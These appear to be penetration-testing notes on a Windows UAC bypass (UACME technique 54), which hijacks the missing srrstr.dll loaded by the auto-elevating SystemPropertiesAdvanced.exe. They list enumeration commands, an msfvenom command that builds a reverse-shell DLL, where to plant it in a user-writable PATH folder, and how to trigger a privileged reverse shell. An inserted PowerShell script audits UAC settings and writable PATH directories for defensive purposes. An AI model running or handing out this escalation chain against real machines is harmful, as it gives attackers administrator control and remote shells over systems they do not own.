Check the current user: whoami /user
Check admin group membership: net localgroup administrators
Check privileges: whoami /priv
Check if UAC is enabled:
REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v EnableLUA
A value of 0x1 means UAC is enabled.
Check UAC level:
REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v ConsentPromptBehaviorAdmin
If it is 0x5, Always notify is enabled.
Check the Windows version with PowerShell:
[environment]::OSVersion.Version
Then cross-reference with this page.
Then check UACME.
Here we try technique 54:
This technique targets the 32-bit version of the auto-elevating binary SystemPropertiesAdvanced.exe.
It tries to load a non-existent DLL, srrstr.dll.
The loader looks for it in the following search order:
- The directory from which the application loaded.
- The system directory C:\Windows\System32 for 64-bit systems.
- The 16-bit system directory C:\Windows\System (not supported on 64-bit systems).
- The Windows directory.
- Any directories that are listed in the PATH environment variable.
Check the PATH:
cmd /c echo %PATH%
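As an added audit script (my own, not from these notes or from UACME), this pairs the UAC registry values queried above with a scan for what the search order depends on: a PATH directory the current user can create files in, or one that already holds the DLL name in question. It assumes Windows PowerShell 5.1 run as the low-privileged user.

```powershell
# Added audit (not part of the original notes). Assumes Windows PowerShell 5.1
# run as the low-privileged user; srrstr.dll is the name the notes discuss.

function Get-UacSetting {
    # Same registry values the notes query with REG QUERY, read via the provider
    $key = 'HKLM:\Software\Microsoft\Windows\CurrentVersion\Policies\System'
    $p = Get-ItemProperty -Path $key
    [pscustomobject]@{
        EnableLUA                  = $p.EnableLUA
        ConsentPromptBehaviorAdmin = $p.ConsentPromptBehaviorAdmin
    }
}

function Test-UserWritable {
    param([string]$Path)
    try { $acl = Get-Acl -LiteralPath $Path -ErrorAction Stop } catch { return $false }
    $id   = [System.Security.Principal.WindowsIdentity]::GetCurrent()
    $sids = @($id.User) + @($id.Groups)
    # CreateFiles (FILE_WRITE_DATA), GENERIC_WRITE or GENERIC_ALL is enough to
    # drop a file; Deny ACEs are ignored, so a hit means "needs a closer look".
    $needed = 0x2 -bor 0x40000000 -bor 0x10000000
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        try { $sid = $ace.IdentityReference.Translate([System.Security.Principal.SecurityIdentifier]) }
        catch { continue }   # unresolvable trustee, skip it
        if (($sids -contains $sid) -and ((([int]$ace.FileSystemRights) -band $needed) -ne 0)) {
            return $true
        }
    }
    return $false
}

function Get-PathAudit {
    param([string]$DllName = 'srrstr.dll')
    foreach ($dir in ($env:PATH -split ';' | Where-Object { $_ -ne '' })) {
        $exists   = Test-Path -LiteralPath $dir
        $writable = if ($exists) { Test-UserWritable -Path $dir } else { $false }
        $planted  = $exists -and (Test-Path -LiteralPath (Join-Path $dir $DllName))
        [pscustomobject]@{
            Directory    = $dir
            Exists       = $exists
            UserWritable = $writable
            DllPresent   = $planted
        }
    }
}

Get-UacSetting
Get-PathAudit | Where-Object { $_.UserWritable -or $_.DllPresent } | Format-Table -AutoSize
```

Any row it prints is a PATH entry that should either lose its user-write ACL or be removed from the system PATH; DllPresent on a directory under the user profile is the planted file itself.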
Then we can place a malicious srrstr.dll in the WindowsApps folder.
Build the malicious srrstr.dll:
msfvenom -p windows/shell_reverse_tcp LHOST=<ip> LPORT=<port> -f dll > srrstr.dll
Running the DLL directly gives a normal (unprivileged) reverse shell:
rundll32 shell32.dll,Control_RunDLL C:\Users\sarah\AppData\Local\Microsoft\WindowsApps\srrstr.dll
To get a privileged shell back, run: C:\Windows\SysWOW64\SystemPropertiesAdvanced.exe
We get a reverse shell back.